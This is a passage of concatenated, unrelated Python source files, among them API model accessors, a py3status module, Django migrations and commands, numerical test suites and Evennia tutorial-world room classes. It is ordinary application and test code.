        return self._embedded_metadata

    @embedded_metadata.setter
    def embedded_metadata(self, value):
        """ Set embedded_metadata value.

            Notes:
                Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.

                
                This attribute is named `embeddedMetadata` in VSD API.
                
        """
        self._embedded_metadata = value

    
    @property
    def entity_scope(self):
        """ Get entity_scope value.

            Notes:
                Specify if scope of entity is Data center or Enterprise level

                
                This attribute is named `entityScope` in VSD API.
                
        """
        return self._entity_scope

    @entity_scope.setter
    def entity_scope(self, value):
        """ Set entity_scope value.

            Notes:
                Specify if scope of entity is Data center or Enterprise level

                
                This attribute is named `entityScope` in VSD API.
                
        """
        self._entity_scope = value

    
    @property
    def creation_date(self):
        """ Get creation_date value.

            Notes:
                Time stamp when this object was created.

                
                This attribute is named `creationDate` in VSD API.
                
        """
        return self._creation_date

    @creation_date.setter
    def creation_date(self, value):
        """ Set creation_date value.

            Notes:
                Time stamp when this object was created.

                
                This attribute is named `creationDate` in VSD API.
                
        """
        self._creation_date = value

    
    @property
    def owner(self):
        """ Get owner value.

            Notes:
                Identifies the user that has created this object.

                
        """
        return self._owner

    @owner.setter
    def owner(self, value):
        """ Set owner value.

            Notes:
                Identifies the user that has created this object.

                
        """
        self._owner = value

    
    @property
    def external_id(self):
        """ Get external_id value.

            Notes:
                External object ID. Used for integration with third party systems

                
                This attribute is named `externalID` in VSD API.
                
        """
        return self._external_id

    @external_id.setter
    def external_id(self, value):
        """ Set external_id value.

            Notes:
                External object ID. Used for integration with third party systems

                
                This attribute is named `externalID` in VSD API.
                
        """
        self._external_id = value

    
    @property
    def type(self):
        """ Get type value.

            Notes:
                The image type

                
        """
        return self._type

    @type.setter
    def type(self, value):
        """ Set type value.

            Notes:
                The image type

                
        """
        self._type = value

    

    
# -*- coding: utf-8 -*-
"""
Display currently playing song from Google Play Music Desktop Player.

Configuration parameters:
    cache_timeout:  how often we refresh this module in seconds (default 5)
    format:         specify the items and ordering of the data in the status bar.
                    These are a 1:1 match to gpmdp-remote's options (default is '♫ {info}').

Format of status string placeholders:
    See `gpmdp-remote help`. Simply surround the items you want displayed (i.e. `album`)
    with curly braces (i.e. `{album}`) and place as-desired in the format string.

    {info}            Print info about now playing song
    {title}           Print current song title
    {artist}          Print current song artist
    {album}           Print current song album
    {album_art}       Print current song album art URL
    {time_current}    Print current song time in milliseconds
    {time_total}      Print total song time in milliseconds
    {status}          Print whether GPMDP is paused or playing
    {current}         Print now playing song in "artist - song" format
    {help}            Print this help message


Requires:
    gpmdp: http://www.googleplaymusicdesktopplayer.com/
    gpmdp-remote: https://github.com/iandrewt/gpmdp-remote

@author Aaron Fields https://twitter.com/spirotot
@license BSD
"""

from time import time
from subprocess import check_output


class Py3status:
    """Show the track currently playing in Google Play Music Desktop
    Player, queried through the `gpmdp-remote` helper."""
    # available configuration parameters
    cache_timeout = 5
    format = u'♫ {info}'

    @staticmethod
    def _run_cmd(cmd):
        """Run `gpmdp-remote <cmd>` and return its stripped stdout."""
        out = check_output(['gpmdp-remote', cmd])
        return out.decode('utf-8').strip()

    def gpmdp(self, i3s_output_list, i3s_config):
        """Build the i3bar response dict for the current track."""
        if self._run_cmd('status') == 'Paused':
            text = ''
        else:
            # Query only the fields actually referenced in the format
            # string, one gpmdp-remote call per placeholder.
            fields = ('info', 'title', 'artist', 'album', 'status',
                      'current', 'time_total', 'time_current', 'album_art')
            values = {name: self._run_cmd(name)
                      for name in fields if '{%s}' % name in self.format}
            text = self.format.format(**values)

        return {
            'cached_until': time() + self.cache_timeout,
            'full_text': text
        }


# Script entry point: exercise this module via py3status's test harness.
if __name__ == "__main__":
    """
    Run module in test mode.
    """
    from py3status.module_test import module_test
    module_test(Py3status)

#!/usr/bin/python

import os

# Credentials for an OpenStack (NeCTAR) cloud.  With the addition of
# Keystone you authenticate against the identity service, which returns a
# **Token** and a **Service Catalog** listing the endpoints of every
# service the user/tenant can reach (nova, glance, keystone, swift).
#
# *NOTE*: Using the 2.0 *auth api* does not mean that the compute api is
# 2.0; the 1.1 *compute api* will be used.
os.environ.update({
    # Keystone authentication endpoint.
    'OS_AUTH_URL': "https://keystone.rc.nectar.org.au:5000/v2.0/",
    # The **tenant** is the entity that owns the resources.
    'OS_TENANT_ID': "123456789012345678901234567890",
    'OS_TENANT_NAME': "tenant_name",
    # The **user** is the entity performing the action.
    'OS_USERNAME': "joe.bloggs@uni.edu.au",
    # With Keystone you pass the keystone password.
    'OS_PASSWORD': "????????????????????",
})


# -*- coding: utf-8 -*-
from __future__ import absolute_import

from .local import Local  # noqa
from .production import Production  # noqa

# This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import app as celery_app

# Possible discounts:
# - Node (administer inline with nodes)
# - Bulk amounts on nodes
# - User
# - Group of users
# - Order (this is more-or-less a voucher)
# - Shipping costs
# Possible amounts:
# - Percentage
# - Fixed amount
# Flag indicating if a discount can be combined with other discounts.
# Boolean "offer" to include in list of offers. Default to true if discount is at node level.
# Save all applied discounts when ordering in a ManyToMany relationship with Order.

import matplotlib.pyplot as plt
import numpy as np
import scalpplot
from scalpplot import plot_scalp
from positions import POS_10_5
from scipy import signal

def plot_timeseries(frames, time=None, offset=None, color='k', linestyle='-'):
  '''
  Plot a multichannel time series with a vertical offset per channel.

  frames is interpreted as (n_samples, n_channels); time supplies the
  x-axis values (defaults to the sample index) and offset the vertical
  spacing between channels (defaults to 3x the largest channel std).
  '''
  frames = np.asarray(frames)
  # `is None` rather than `== None`: comparing an ndarray with == is
  # elementwise, so `if time == None` raises "truth value is ambiguous"
  # whenever an array is passed for `time` (and E711 besides).
  if offset is None:
    offset = np.max(np.std(frames, axis=0)) * 3
  if time is None:
    time = np.arange(frames.shape[0])
  plt.plot(time, frames - np.mean(frames, axis=0) +
    np.arange(frames.shape[1]) * offset, color=color, ls=linestyle)


def plot_scalpgrid(scalps, sensors, locs=POS_10_5, width=None, 
  clim=None, cmap=None, titles=None):
  '''
  Plots a grid with scalpplots. Scalps contains the different scalps in the
  rows, sensors contains the names for the columns of scalps, locs is a dict
  that maps the sensor-names to locations.

  Width determines the width of the grid that contains the plots. Cmap selects
  a colormap, for example plt.cm.RdBu_r is very useful for AUC-ROC plots.
  Clim is a list containing the minimum and maximum value mapped to a color.

  Titles is an optional list with titles for each subplot.

  Returns a list with subplots for further manipulation.
  '''
  scalps = np.asarray(scalps)
  assert scalps.ndim == 2
  nscalps = scalps.shape[0]
  subplots = []

  # Default grid: at most 8 columns, roughly square otherwise.
  if not width:
    width = int(min(8, np.ceil(np.sqrt(nscalps))))
  height = int(np.ceil(nscalps/float(width)))

  # Default color limits: the shared data range, so scalps are comparable.
  if not clim:
    clim = [np.min(scalps), np.max(scalps)]

  plt.clf()
  for i in range(nscalps):
    subplots.append(plt.subplot(height, width, i + 1))
    plot_scalp(scalps[i], sensors, locs, clim=clim, cmap=cmap)
    if titles:
      plt.title(titles[i])

  # plot colorbar next to last scalp
  bb = plt.gca().get_position()
  plt.colorbar(cax=plt.axes([bb.xmax + bb.width/10, bb.ymin, bb.width/10,
    bb.height]), ticks=np.linspace(clim[0], clim[1], 5).round(2))

  return subplots

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):
    """Create the Show2 model.

    NOTE(review): the b'' TextField defaults are a Python 2 artifact,
    kept unchanged here.
    """

    dependencies = [
        ('setlist', '0012_remove_show_leg'),
    ]

    operations = [
        migrations.CreateModel(
            name='Show2',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('venue', models.ForeignKey(to='setlist.Venue', to_field='id')),
                ('tour', models.ForeignKey(to='setlist.Tour', to_field='id')),
                ('date', models.DateField(db_index=True)),
                ('setlist', models.TextField(default=b'', blank=True)),
                ('notes', models.TextField(default=b'', blank=True)),
                ('source', models.TextField(default=b'', blank=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]

#!/usr/bin/env python
import sys
from os.path import *
import os
from pyflann import *
from copy import copy
from numpy import *
from numpy.random import *
import unittest

class Test_PyFLANN_nn(unittest.TestCase):
    """Nearest-neighbor correctness tests for FLANN's autotuned index."""

    def setUp(self):
        self.nn = FLANN(log_level="warning")

    ################################################################################
    # The typical

    def test_nn_2d_10pt(self):
        self.__nd_random_test_autotune(2, 2)

    def test_nn_autotune_2d_1000pt(self):
        self.__nd_random_test_autotune(2, 1000)

    def test_nn_autotune_100d_1000pt(self):
        self.__nd_random_test_autotune(100, 1000)

    def test_nn_autotune_500d_100pt(self):
        self.__nd_random_test_autotune(500, 100)

    #
    #    ##########################################################################################
    #    # Stress it should handle
    #
    def test_nn_stress_1d_1pt_kmeans_autotune(self):
        self.__nd_random_test_autotune(1, 1)

    def __ensure_list(self, arg):
        # Normalize a scalar neighbor result to a one-element list so the
        # set-intersection below works uniformly for num_neighbors == 1.
        # (isinstance instead of type(...) != list: accepts list subclasses.)
        if not isinstance(arg, list):
            return [arg]
        return arg

    def __nd_random_test_autotune(self, dim, N, num_neighbors=1, **kwargs):
        """
        Make a set of random points, then pass the same ones to the
        query points.  Each point should be closest to itself.
        """
        seed(0)  # deterministic data so failures are reproducible
        x = rand(N, dim)
        xq = rand(N, dim)
        # NOTE(review): unused, but kept so the RNG call sequence after
        # seed(0) is unchanged from the original.
        perm = permutation(N)

        # compute ground truth nearest neighbors by exhaustive search
        gt_idx, gt_dist = self.nn.nn(x, xq,
                algorithm='linear',
                num_neighbors=num_neighbors)

        for tp in [0.70, 0.80, 0.90]:
            nidx, ndist = self.nn.nn(x, xq,
                    algorithm='autotuned',
                    sample_fraction=1.0,
                    num_neighbors=num_neighbors,
                    target_precision=tp, checks=-2, **kwargs)

            # fraction of autotuned results agreeing with the ground truth
            correctness = 0.0
            for i in range(N):  # range: xrange is Python-2-only
                l1 = self.__ensure_list(nidx[i])
                l2 = self.__ensure_list(gt_idx[i])
                correctness += float(len(set(l1).intersection(l2))) / num_neighbors
            correctness /= N
            # allow 10% slack relative to the requested target precision;
            # assertTrue: assert_ was deprecated and removed in Python 3.12
            self.assertTrue(correctness >= tp * 0.9,
                            'failed #1: targ_prec=%f, N=%d,correctness=%f' % (tp, N, correctness))
        
# Run the suite when executed directly (e.g. ``python this_file.py``).
if __name__ == '__main__':
    unittest.main()

# -*- coding: utf-8 -*-
from collections import OrderedDict
import locale
from optparse import make_option
from verify.management.commands import VerifyBaseCommand
from verify.models import *
from verify.politici_models import *
from django.db.models import Q, Count

__author__ = 'guglielmo'



class Command(VerifyBaseCommand):
    """
    Report of overall gender statistics, at the national level,
    for all organs of all institutions.
    May be limited to one or more institutions, by passing a list
    of institution_id values.
    """
    args = '<institution_id institution_id ...>'
    help = "Check that all locations have only male components (list locations with female components)."

    # no extra CLI options beyond those of the base verification command
    option_list = VerifyBaseCommand.option_list

    def execute_verification(self, *args, **options):
        """Build one report row per (institution, charge type), with
        female/male counts and percentages among currently-active charges.

        ``args`` may contain institution ids used to narrow the report.
        """

        # column headers for the report (presumably consumed as CSV by
        # VerifyBaseCommand -- confirm in the base class)
        self.csv_headers = ["ISTITUZIONE", "INCARICO", "N_DONNE", "N_UOMINI", "N_TOTALI", "PERC_DONNE", "PERC_UOMINI"]

        institutions = OpInstitution.objects.using('politici').all()
        if args:
            # restrict to the requested institutions
            institutions = institutions.filter(id__in=args)
            self.logger.info(
                "Verification {0} launched with institutions limited to {1}".format(
                    self.__class__.__module__, ",".join(institutions.values_list('id', flat=True))
                )
            )
        else:
            self.logger.info(
                "Verification {0} launched for all institutions".format(
                    self.__class__.__module__
                )
            )

        self.ok_locs = []
        self.ko_locs = []

        for institution in institutions:

            # ids of charge types with at least one active (non-deleted,
            # not-ended) charge in this institution
            charge_types_ids = OpInstitutionCharge.objects.using('politici').\
                filter(date_end__isnull=True,
                       content__deleted_at__isnull=True).\
                filter(institution=institution).\
                values_list('charge_type', flat=True).\
                distinct()
            charge_types = OpChargeType.objects.using('politici').\
                filter(id__in=charge_types_ids)

            for charge_type in charge_types:
                self.logger.info(
                    "Counting {0} in {1}".format(
                        charge_type.name, institution.name
                    )
                )
                # active charges of this type within this institution
                qs = OpInstitutionCharge.objects.using('politici').\
                    filter(date_end__isnull=True,
                           content__deleted_at__isnull=True).\
                    filter(institution=institution,
                           charge_type=charge_type)

                n_tot = qs.count()
                n_fem = qs.filter(politician__sex__iexact='f').count()
                n_mal = n_tot - n_fem

                # NOTE(review): n_tot should always be >= 1 here because
                # charge_types was derived from the same filters; otherwise
                # the percentages below would divide by zero -- confirm.
                merged = [institution.name, charge_type.name, n_fem, n_mal, n_tot,]
                merged.append(locale.format("%.2f",100. * n_fem / float(n_tot) ))
                merged.append(locale.format("%.2f",100. * n_mal / float(n_tot) ))
                self.ko_locs.append(merged)

        # every row lands in ko_locs, so the outcome is always 'failed';
        # looks intentional for a pure report -- confirm
        outcome = Verification.OUTCOME.failed
        self.logger.info(
            # NOTE(review): len(ko_locs) counts rows, not institutions
            "Report for {0} institutions generated.".format(
                len(self.ko_locs)
            )
        )
        return outcome



#!/usr/bin/env python
from distutils.core import setup

# Long description shown on the package index page.
LONG_DESCRIPTION = (
    'The modeltranslation application can be used to '
    'translate dynamic content of existing models to an '
    'arbitrary number of languages without having to '
    'change the original model classes. It uses a '
    'registration approach (comparable to Django\'s admin '
    'app) to be able to add translations to existing or '
    'new projects and is fully integrated into the Django '
    'admin backend.'
)

# Distribution metadata for django-modeltranslation.
setup(
    name='django-modeltranslation',
    version='0.4.0-alpha1',
    description='Translates Django models using a registration approach.',
    long_description=LONG_DESCRIPTION,
    author='Peter Eschler',
    author_email='p.eschler@nmy.de',
    maintainer='Dirk Eschler',
    maintainer_email='d.eschler@nmy.de',
    url='http://code.google.com/p/django-modeltranslation/',
    download_url='http://django-modeltranslation.googlecode.com/files/django-modeltranslation-0.4.0-alpha1.tar.gz',
    packages=[
        'modeltranslation',
        'modeltranslation.management',
        'modeltranslation.management.commands',
    ],
    package_data={
        'modeltranslation': [
            'static/modeltranslation/css/*.css',
            'static/modeltranslation/js/*.js',
        ],
    },
    include_package_data=True,
    requires=['django(>=1.0)'],
    classifiers=[
        'Framework :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
    ],
    license='New BSD',
)

#!/usr/bin/python

# Copyright (c) 2009, Purdue University
# All rights reserved.
# 
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
# 
# Neither the name of the Purdue University nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
# 
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.


"""Test for Credential cache library."""

__copyright__ = 'Copyright (C) 2009, Purdue University'
__license__ = 'BSD'
__version__ = '#TRUNK#'


import unittest
import os

import roster_core
from roster_server import credentials


# Paths to test fixtures, relative to the test working directory.
CONFIG_FILE = 'test_data/roster.conf' # Example in test_data
SCHEMA_FILE = '../roster-core/data/database_schema.sql'  # NOTE(review): unused in the visible code
DATA_FILE = 'test_data/test_data.sql'


class TestCredentialsLibrary(unittest.TestCase):
  """Tests credential creation/validation against a fresh Roster database."""

  def setUp(self):
    """Rebuild the test database from fixtures and create core instances."""
    self.config_instance = roster_core.Config(file_name=CONFIG_FILE)
    self.cred_instance = credentials.CredCache(self.config_instance,
                                               u'sharrell')
    db_instance = self.config_instance.GetDb()

    db_instance.CreateRosterDatabase()

    # Use a context manager so the fixture file handle is always closed
    # (the original ``open(...).read()`` leaked it).
    with open(DATA_FILE, 'r') as data_file:
      data = data_file.read()
    db_instance.StartTransaction()
    db_instance.cursor.execute(data)
    db_instance.EndTransaction()
    db_instance.close()

    self.core_instance = roster_core.Core(u'sharrell', self.config_instance)

  def is_valid_uuid(self, uuid):
    """
    TAKEN FROM THE BLUEZ MODULE

    is_valid_uuid (uuid) -> bool

    returns True if uuid is a valid 128-bit UUID.

    valid UUIDs are always strings taking one of the following forms:
        XXXX
        XXXXXXXX
        XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
    where each X is a hexadecimal digit (case insensitive)
    """
    try:
      if len(uuid) == 4:
        if int(uuid, 16) < 0: return False
      elif len(uuid) == 8:
        if int(uuid, 16) < 0: return False
      elif len(uuid) == 36:
        # dashed form: 8-4-4-4-12 hex digits
        pieces = uuid.split("-")
        if len(pieces) != 5 or \
              len(pieces[0]) != 8 or \
              len(pieces[1]) != 4 or \
              len(pieces[2]) != 4 or \
              len(pieces[3]) != 4 or \
              len(pieces[4]) != 12:
          return False
        # every piece must parse as hexadecimal
        [int(p, 16) for p in pieces]
      else:
        return False
    except ValueError:
      # non-hex characters anywhere make the uuid invalid
      return False
    except TypeError:
      # non-sized / non-string input is invalid, not an error
      return False
    return True

  def testCredentials(self):
    """A fresh credential validates; a bogus credential string does not."""
    self.assertTrue(self.cred_instance.Authenticate(u'sharrell', 'test'))
    cred_string = self.cred_instance.GetCredentials(u'sharrell', 'test',
                                                    self.core_instance)
    self.assertEqual(self.cred_instance.CheckCredential(cred_string,
                                                        u'sharrell',
                                                       self.core_instance),
                     u'')
    self.assertEqual(self.cred_instance.CheckCredential(u'test', u'sharrell',
                                                        self.core_instance),
                     None)

# Run the suite when executed directly.
if __name__ == '__main__':
  unittest.main()

#!/usr/bin/env python
# Integration test for map-valued attributes; expects the HyperDex
# coordinator host and port as command-line arguments.
import sys
import hyperdex.client
from hyperdex.client import LessEqual, GreaterEqual, Range, Regex, LengthEquals, LengthLessEqual, LengthGreaterEqual
# connect to the coordinator given as ``host port`` on argv
c = hyperdex.client.Client(sys.argv[1], int(sys.argv[2]))
def to_objectset(xs):
    """Turn an iterable of dicts into a set of frozensets of their items,
    so two result collections can be compared ignoring order."""
    return {frozenset(d.items()) for d in xs}
# round-trip an empty document
assert c.put('kv', 'k', {}) == True
assert c.get('kv', 'k') == {'v': {}}
# store and read back a populated int->float map attribute
assert c.put('kv', 'k', {'v': {1: 3.14, 2: 0.25, 3: 1.0}}) == True
assert c.get('kv', 'k') == {'v': {1: 3.14, 2: 0.25, 3: 1.0}}
# overwrite with an empty map again
assert c.put('kv', 'k', {'v': {}}) == True
assert c.get('kv', 'k') == {'v': {}}

"""

Room Typeclasses for the TutorialWorld.

This defines special types of Rooms available in the tutorial. To keep
everything in one place we define them together with the custom
commands needed to control them. Those commands could also have been
in a separate module (e.g. if they could have been re-used elsewhere.)

"""
from __future__ import print_function

import random
from evennia import TICKER_HANDLER
from evennia import CmdSet, Command, DefaultRoom
from evennia import utils, create_object, search_object
from evennia import syscmdkeys, default_cmds
from evennia.contrib.tutorial_world.objects import LightSource

# the system error-handling module is defined in the settings. We load the
# given setting here using utils.object_from_module. This way we can use
# it regardless of if we change settings later.
from django.conf import settings
_SEARCH_AT_RESULT = utils.object_from_module(settings.SEARCH_AT_RESULT)

# -------------------------------------------------------------
#
# Tutorial room - parent room class
#
# This room is the parent of all rooms in the tutorial.
# It defines a tutorial command on itself (available to
# all those who are in a tutorial room).
#
# -------------------------------------------------------------

#
# Special command available in all tutorial rooms


class CmdTutorial(Command):
    """
    Get help during the tutorial

    Usage:
      tutorial [obj]

    This command allows you to get behind-the-scenes info
    about an object or the current location.

    """
    key = "tutorial"
    aliases = ["tut"]
    locks = "cmd:all()"
    help_category = "TutorialWorld"

    def func(self):
        """
        Look up the `tutorial_info` Attribute on the target (either a
        searched-for object or the room this command sits on) and show it.
        """
        if self.args:
            target = self.caller.search(self.args.strip())
            if not target:
                # search() already reported the failure to the caller
                return
        else:
            # default to the room this command is defined on
            target = self.obj

        helptext = target.db.tutorial_info
        if helptext:
            self.caller.msg("|G%s|n" % helptext)
        else:
            self.caller.msg("|RSorry, there is no tutorial help available here.|n")


# for the @detail command we inherit from MuxCommand, since
# we want to make use of MuxCommand's pre-parsing of '=' in the
# argument.
class CmdTutorialSetDetail(default_cmds.MuxCommand):
    """
    sets a detail on a room

    Usage:
        @detail <key> = <description>
        @detail <key>;<alias>;... = description

    Example:
        @detail walls = The walls are covered in ...
        @detail castle;ruin;tower = The distant ruin ...

    This sets a "detail" on the object this command is defined on
    (TutorialRoom for this tutorial). This detail can be accessed with
    the TutorialRoomLook command sitting on TutorialRoom objects (details
    are set as a simple dictionary on the room). This is a Builder command.

    We custom parse the key for the ;-separator in order to create
    multiple aliases to the detail all at once.
    """
    key = "@detail"
    locks = "cmd:perm(Builder)"
    help_category = "TutorialWorld"

    def func(self):
        """
        Validate the input, then hand each ;-separated key to the
        object's set_detail method (if it has one).
        """
        if not self.args or not self.rhs:
            self.caller.msg("Usage: @detail key = description")
            return
        if not hasattr(self.obj, "set_detail"):
            self.caller.msg("Details cannot be set on %s." % self.obj)
            return
        # every ;-separated part of the lhs becomes an alias pointing to
        # the same description (a single key just loops once)
        for alias in self.lhs.split(";"):
            self.obj.set_detail(alias, self.rhs)
        self.caller.msg("Detail set: '%s': '%s'" % (self.lhs, self.rhs))


class CmdTutorialLook(default_cmds.CmdLook):
    """
    looks at the room and on details

    Usage:
        look <obj>
        look <room detail>
        look *<account>

    Observes your location, details at your location or objects
    in your vicinity.

    Tutorial: This is a child of the default Look command, that also
    allows us to look at "details" in the room.  These details are
    things to examine and offers some extra description without
    actually having to be actual database objects. It uses the
    return_detail() hook on TutorialRooms for this.
    """
    # we don't need to specify key/locks etc, this is already
    # set by the parent.
    help_category = "TutorialWorld"

    def func(self):
        """
        Handle the looking. This is a copy of the default look
        code except for adding in the details.
        """
        caller = self.caller
        args = self.args
        if args:
            # we use quiet=True to turn off automatic error reporting.
            # This tells search that we want to handle error messages
            # ourself. This also means the search function will always
            # return a list (with 0, 1 or more elements) rather than
            # result/None.
            looking_at_obj = caller.search(args,
                                           # note: excludes room/room aliases
                                           candidates=caller.location.contents + caller.contents,
                                           use_nicks=True, quiet=True)
            if len(looking_at_obj) != 1:
                # no target found or more than one target found (multimatch)
                # look for a detail that may match
                detail = self.obj.return_detail(args)
                if detail:
                    self.caller.msg(detail)
                    return
                else:
                    # no detail found, delegate our result to the normal
                    # error message handler.
                    _SEARCH_AT_RESULT(None, caller, args, looking_at_obj)
                    return
            else:
                # we found a match, extract it from the list and carry on
                # normally with the look handling.
                looking_at_obj = looking_at_obj[0]

        else:
            looking_at_obj = caller.location
            if not looking_at_obj:
                caller.msg("You have no location to look at!")
                return

        if not hasattr(looking_at_obj, 'return_appearance'):
            # this is likely due to us having an account instead
            # (accounts wrap a puppeted character -- confirm with Evennia docs)
            looking_at_obj = looking_at_obj.character
        if not looking_at_obj.access(caller, "view"):
            # hide objects the caller has no "view" lock access to
            caller.msg("Could not find '%s'." % args)
            return
        # get object's appearance
        caller.msg(looking_at_obj.return_appearance(caller))
        # the object's at_desc() method.
        looking_at_obj.at_desc(looker=caller)
        return


class TutorialRoomCmdSet(CmdSet):
    """
    Implements the simple tutorial cmdset. This will overload the look
    command in the default CharacterCmdSet since it has a higher
    priority (CharacterCmdSet has prio 0).
    """
    key = "tutorial_cmdset"
    priority = 1

    def at_cmdset_creation(self):
        """Populate the cmdset with all tutorial-room commands."""
        for command in (CmdTutorial(), CmdTutorialSetDetail(), CmdTutorialLook()):
            self.add(command)


class TutorialRoom(DefaultRoom):
    """
    Base room type for all rooms in the tutorial world.
    It defines a cmdset on itself for reading tutorial info about the location.
    """

    def at_object_creation(self):
        """Called once, when the room is first created."""
        self.db.tutorial_info = "This is a tutorial room. It allows you to use the 'tutorial' command."
        self.cmdset.add_default(TutorialRoomCmdSet)

    def at_object_receive(self, new_arrival, source_location):
        """
        When an object enters a tutorial room we tell other objects in
        the room about it by trying to call a hook on them. The Mob object
        uses this to cheaply get notified of enemies without having
        to constantly scan for them.

        Args:
            new_arrival (Object): the object that just entered this room.
            source_location (Object): the previous location of new_arrival.

        """
        is_character = new_arrival.has_account and not new_arrival.is_superuser
        if not is_character:
            return
        for neighbor in self.contents_get(exclude=new_arrival):
            if hasattr(neighbor, "at_new_arrival"):
                neighbor.at_new_arrival(new_arrival)

    def return_detail(self, detailkey):
        """
        Return the description stored under `detailkey` in the
        "details" Attribute, or None if absent.

        Args:
            detailkey (str): The detail being looked at. This is
                case-insensitive.

        """
        details = self.db.details
        return details.get(detailkey.lower(), None) if details else None

    def set_detail(self, detailkey, description):
        """
        Store a new detail in the "details" Attribute, creating the
        dict on first use.

        Args:
            detailkey (str): The detail identifier to add (for
                aliases you need to add multiple keys to the
                same description). Case-insensitive.
            description (str): The text to return when looking
                at the given detailkey.

        """
        existing = self.db.details
        if existing:
            existing[detailkey.lower()] = description
        else:
            self.db.details = {detailkey.lower(): description}


# -------------------------------------------------------------
#
# Weather room - room with a ticker
#
# -------------------------------------------------------------

# Rainy-weather flavour messages; WeatherRoom.update_weather picks one of
# these at random and echoes it to everyone in the room.
WEATHER_STRINGS = (
    "The rain coming down from the iron-grey sky intensifies.",
    "A gust of wind throws the rain right in your face. Despite your cloak you shiver.",
    "The rainfall eases a bit and the sky momentarily brightens.",
    "For a moment it looks like the rain is slowing, then it begins anew with renewed force.",
    "The rain pummels you with large, heavy drops. You hear the rumble of thunder in the distance.",
    "The wind is picking up, howling around you, throwing water droplets in your face. It's cold.",
    "Bright fingers of lightning flash over the sky, moments later followed by a deafening rumble.",
    "It rains so hard you can hardly see your hand in front of you. You'll soon be drenched to the bone.",
    "Lightning strikes in several thundering bolts, striking the trees in the forest to your west.",
    "You hear the distant howl of what sounds like some sort of dog or wolf.",
    "Large clouds rush across the sky, throwing their load of rain over the world.")


class WeatherRoom(TutorialRoom):
    """
    This should probably better be called a rainy room...

    This sets up an outdoor room typeclass. At irregular intervals,
    the effects of weather will show in the room. Outdoor rooms should
    inherit from this.

    """

    def at_object_creation(self):
        """
        Called when the object is first created.

        Registers this room with the TickerHandler so `update_weather`
        is invoked repeatedly. The interval is randomized so that not
        all weather rooms update at the same time. (A Script could
        manage the ticking too; the TickerHandler is fine for simple
        things like this.)
        """
        super(WeatherRoom, self).at_object_creation()
        self.db.interval = random.randint(50, 70)
        TICKER_HANDLER.add(interval=self.db.interval,
                           callback=self.update_weather,
                           idstring="tutorial")
        # this is parsed by the 'tutorial' command on TutorialRooms
        self.db.tutorial_info = ("This room has a Script running that has it "
                                 "echo a weather-related message at irregular intervals.")

    def update_weather(self, *args, **kwargs):
        """
        Called by the tickerhandler at regular intervals. Even so, we
        only update 20% of the time, picking a random weather message
        when we do. (The tickerhandler requires this hook to accept
        arbitrary positional/keyword arguments, hence *args/**kwargs.)
        """
        if random.random() >= 0.2:
            # skip 80% of the ticks
            return
        self.msg_contents("|w%s|n" % random.choice(WEATHER_STRINGS))


# Shown to superusers entering the tutorial; str.format()-ed with the
# account name and the quell command. The original ended with a stray
# trailing backslash that silently continued the statement onto the
# following blank line -- removed here.
SUPERUSER_WARNING = "\nWARNING: You are playing as a superuser ({name}). Use the {quell} command to\n" \
                    "play without superuser privileges (many functions and puzzles ignore the \n" \
                    "presence of a superuser, making this mode useful for exploring things behind \n" \
                    "the scenes later).\n"


# ------------------------------------------------------------
#
# Intro Room - unique room
#
# This room marks the start of the tutorial. It sets up properties on
# the player char that is needed for the tutorial.
#
# -------------------------------------------------------------


class IntroRoom(TutorialRoom):
    """
    Intro room

    properties to customize:
     char_health - integer > 0 (default 20)
    """

    def at_object_creation(self):
        """
        Called when the room is first created.
        """
        super(IntroRoom, self).at_object_creation()
        self.db.tutorial_info = ("The first room of the tutorial. "
                                 "This assigns the health Attribute to "
                                 "the account.")

    def at_object_receive(self, character, source_location):
        """
        Assign properties on characters
        """
        # starting health is customizable via the room's char_health
        start_health = self.db.char_health or 20

        if character.has_account:
            character.db.health = start_health
            character.db.health_max = start_health

        if character.is_superuser:
            # warn superusers that puzzles may ignore them
            banner = "-" * 78 + SUPERUSER_WARNING + "-" * 78
            character.msg("|r%s|n" % banner.format(name=character.key, quell="|w@quell|r"))


# -------------------------------------------------------------
#
# Bridge - unique room
#
# Defines a special west-eastward "bridge"-room, a large room that takes
# several steps to cross. It is complete with custom commands and a
# chance of falling off the bridge. This room has no regular exits,
# instead the exitings are handled by custom commands set on the account
# upon first entering the room.
#
# Since one can enter the bridge room from both ends, it is
# divided into five steps:
#       westroom <- 0 1 2 3 4 -> eastroom
#
# -------------------------------------------------------------


class CmdEast(Command):
    """
    Go eastwards across the bridge.

    Tutorial info:
        This command relies on the caller having two Attributes
        (assigned by the room when entering):
            - east_exit: a unique name or dbref to the room to go to
              when exiting east.
            - west_exit: a unique name or dbref to the room to go to
